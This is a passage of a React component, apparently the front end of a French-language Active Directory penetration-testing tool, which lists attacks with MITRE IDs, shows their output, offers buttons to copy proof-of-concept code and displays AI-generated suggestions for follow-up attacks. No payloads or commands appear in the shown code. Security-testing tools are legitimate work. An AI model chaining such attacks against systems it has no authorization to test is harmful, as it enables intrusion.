                {(expandedCategory === category.id || viewMode === 'list') && (
                  <div className="px-4 pb-4">
                    <div className={`grid gap-2 ${viewMode === 'grid' ? 'grid-cols-1 md:grid-cols-2' : 'grid-cols-1'}`}>
                      {category.attacks.map((attack) => (
                        <button
                          key={attack.id}
                          onClick={() => handleAttackClick(attack)}
                          disabled={isRunning}
                          className={`flex items-center justify-between p-3 rounded-lg border transition-all ${
                            isRunning
                              ? 'bg-gray-900 border-gray-800 text-gray-600 cursor-not-allowed'
                              : 'bg-brand-black border-gray-800 hover:border-brand-green/50 hover:bg-brand-green/10 text-gray-300'
                          }`}
                        >
                          <div className="text-left flex-1">
                            <div className="font-medium text-sm flex items-center gap-2">
                              {attack.name}
                              {attack.isNew && (
                                <span className="text-xs px-1.5 py-0.5 bg-brand-green/20 text-brand-green rounded-full border border-brand-green/50 animate-pulse">
                                  NEW
                                </span>
                              )}
                              <span className="text-xs px-1.5 py-0.5 bg-gray-800 text-gray-500 rounded">
                                {attack.mitre}
                              </span>
                            </div>
                            <div className="text-xs text-gray-500 flex items-center gap-2">
                              <span>{attack.tool}</span>
                              <span className="text-gray-700">|</span>
                              <span className="truncate">{attack.description}</span>
                            </div>
                          </div>
                          <div className="flex items-center gap-2 ml-2">
                            <button
                              onClick={(e) => {
                                e.stopPropagation();
                                const code = generatePoCCode(attack);
                                navigator.clipboard.writeText(code);
                                alert('Code PoC copie!');
                              }}
                              className="p-1.5 bg-gray-800 text-gray-400 rounded hover:bg-gray-700 hover:text-white"
                              title="Copier PoC"
                            >
                              <Code className="w-3 h-3" />
                            </button>
                            {isRunning && selectedAttack?.id === attack.id ? (
                              <Loader2 className="w-4 h-4 animate-spin text-brand-green" />
                            ) : (
                              <Play className="w-4 h-4 opacity-50" />
                            )}
                          </div>
                        </button>
                      ))}
                    </div>
                  </div>
                )}
              </div>
            ))}
            </div>
          </div>

          {/* Results Panel - Target (Right Side) */}
          <div className="space-y-4 flex flex-col">
            <h2 className="text-xl font-bold text-cyan-400 flex items-center gap-2">
              <Target className="w-5 h-5" />
              {t('ad.targetResults')}
            </h2>
            <div className="bg-brand-black-light rounded-xl p-4 border border-cyan-500/30 flex-1 min-h-[600px] overflow-y-auto">
              {attackResults.length === 0 ? (
                <div className="flex flex-col items-center justify-center h-full min-h-[400px] text-center">
                  <div className="p-6 rounded-2xl border border-cyan-500/30 bg-gradient-to-b from-cyan-500/10 to-transparent">
                    <div className="w-16 h-16 mx-auto mb-4 rounded-full bg-cyan-500/20 flex items-center justify-center ring-2 ring-cyan-500/30 ring-offset-2 ring-offset-brand-black-light">
                      <Target className="w-8 h-8 text-cyan-400" />
                    </div>
                    <p className="text-lg font-medium text-white mb-2">{t('ad.noDataMessage')}</p>
                    <p className="text-sm text-gray-400 max-w-[250px]">{t('ad.noDataHint')}</p>
                    <div className="mt-4 flex items-center justify-center gap-2 text-xs text-cyan-400/70">
                      <Play className="w-3 h-3" />
                      <span>{t('ad.readyToStart')}</span>
                    </div>
                  </div>
                </div>
              ) : (
                <div className="space-y-4">
                  {attackResults.map((result) => (
                    <div
                      key={result.id}
                      className={`p-4 rounded-lg border ${
                        result.status === 'running'
                          ? 'border-yellow-500/50 bg-yellow-500/10'
                          : result.status === 'completed'
                          ? 'border-green-500/50 bg-green-500/10'
                          : 'border-red-500/50 bg-red-500/10'
                      }`}
                    >
                      <div className="flex items-center justify-between mb-2">
                        <div className="font-bold text-white">{result.attack}</div>
                        <div className="flex items-center gap-2">
                          {result.status === 'running' ? (
                            <Loader2 className="w-4 h-4 animate-spin text-yellow-400" />
                          ) : result.status === 'completed' ? (
                            <CheckCircle className="w-4 h-4 text-green-400" />
                          ) : (
                            <XCircle className="w-4 h-4 text-red-400" />
                          )}
                          <span className={`text-xs ${
                            result.status === 'running' ? 'text-yellow-400' :
                            result.status === 'completed' ? 'text-green-400' : 'text-red-400'
                          }`}>
                            {t(`scans.status.${result.status}`)}
                          </span>
                        </div>
                      </div>
                      <div className="text-xs text-gray-500 mb-2 flex items-center gap-2">
                        <span>{t('ad.tool')}: {result.tool}</span>
                        <span className="text-gray-700">|</span>
                        <span>{result.mitre}</span>
                        <span className="text-gray-700">|</span>
                        <span>{new Date(result.startTime).toLocaleTimeString()}</span>
                      </div>
                      <div className="bg-brand-black rounded p-2 font-mono text-xs text-gray-400 max-h-32 overflow-y-auto">
                        {result.output.map((line, idx) => (
                          <div key={idx} className={
                            line.startsWith('[+]') ? 'text-green-400' :
                            line.startsWith('[!]') ? 'text-yellow-400' :
                            line.startsWith('[-]') ? 'text-red-400' : ''
                          }>
                            {line}
                          </div>
                        ))}
                      </div>

                      {/* Copy PoC button */}
                      <button
                        onClick={() => {
                          navigator.clipboard.writeText(result.poc_code);
                          alert('Code PoC copie!');
                        }}
                        className="mt-2 px-2 py-1 bg-gray-800 text-gray-400 rounded text-xs hover:bg-gray-700 flex items-center gap-1"
                      >
                        <Copy className="w-3 h-3" />
                        Copier PoC Code
                      </button>

                      {result.aiAnalysis && (
                        <div className="mt-3 p-3 bg-brand-green/10 border border-brand-green/30 rounded-lg">
                          <div className="flex items-center gap-2 mb-2">
                            <Brain className="w-4 h-4 text-brand-green" />
                            <span className="text-sm font-bold text-brand-green">Analyse IA</span>
                          </div>
                          <div className="mb-2">
                            <MarkdownRenderer content={result.aiAnalysis.recommendation} variant="compact" />
                          </div>
                          <div className="text-xs text-gray-500 mb-2">
                            <strong>Prochaines etapes:</strong>
                            <ul className="list-disc list-inside mt-1">
                              {result.aiAnalysis.nextSteps.map((step, idx) => (
                                <li key={idx}>{step}</li>
                              ))}
                            </ul>
                          </div>
                          {/* Next attacks */}
                          {result.aiAnalysis.next_attacks && (
                            <div className="flex flex-wrap gap-1 mt-2">
                              {result.aiAnalysis.next_attacks.map((attackId, i) => {
                                const attack = attackCategories
                                  .flatMap(c => c.attacks)
                                  .find(a => a.id === attackId);
                                return attack ? (
                                  <button
                                    key={i}
                                    onClick={() => handleAttackClick(attack)}
                                    disabled={isRunning}
                                    className="px-2 py-0.5 bg-brand-green/20 text-brand-green rounded text-xs hover:bg-brand-green/30"
                                  >
                                    {attack.name}
                                  </button>
                                ) : null;
                              })}
                            </div>
                          )}
                        </div>
                      )}
                    </div>
                  ))}
                </div>
              )}
            </div>
          </div>
        </div>

          </>
        )}
      </div>
    </div>
    </PlanRestrictedPage>
  );
};

export default ADPentest;
